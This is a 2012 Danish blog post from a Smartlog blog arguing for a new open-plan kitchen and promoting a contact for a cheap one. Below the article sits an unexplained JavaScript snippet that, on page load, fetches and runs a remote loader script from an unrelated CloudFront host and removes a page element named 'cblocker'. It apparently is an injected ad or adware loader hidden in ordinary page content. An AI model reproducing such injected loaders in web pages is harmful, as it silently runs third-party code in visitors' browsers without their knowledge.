Smartlog v3 » Tips, Guides & Informationer » Nye tider – nyt køkken
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Nye tider – nyt køkken

27. Jul 2012 13:22, webmayn

Står du som mange andre danskere med et køkken af ældre dato, der langt fra er samtalevenligt? Så er det på tide, at du konsulterer en håndværker og hører, hvad mulighederne er.

 

For køkkenet er for mange familier gået hen og blevet det rum, som man opholder sig mest i. Det kan i en travl og stresset hverdag være svært at samle familien rundt om bordet men med et nyt og åbent køkken, er mulighederne mange. I stedet for at børnene gemmer sig væk på værelset, så hvorfor ikke få lavet et køkken med plads til alle?

 

I dag bruges køkkenet nemlig ikke kun til at lave mad i – man ser lige såvel tv, laver lektier, hører musik eller inviterer venner og familie over til middag. Hvor man før delte boligen op i spisestue og køkken, nyder mange i dag at have et større og åbnet køkken. På den måde disponeres pladsen også bedre, da det efterhånden hører sjældenhederne til, at man sætter sig ind i spisestuen, når man har gæster. Derfor er spisestuerne i flere boliger ofte blevet til et lokale, der ikke udnyttes i hverdagen, og flere bruger det endda til at gemme ting af vejen og opmagasinering af diverse ting og sager.

 

Hvis din bolig også trænger til et nyt køkken med bedre pladsmuligheder, så kan du kontakte en kvalificeret håndværker og høre om mulighederne for et billigt køkken .

 

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede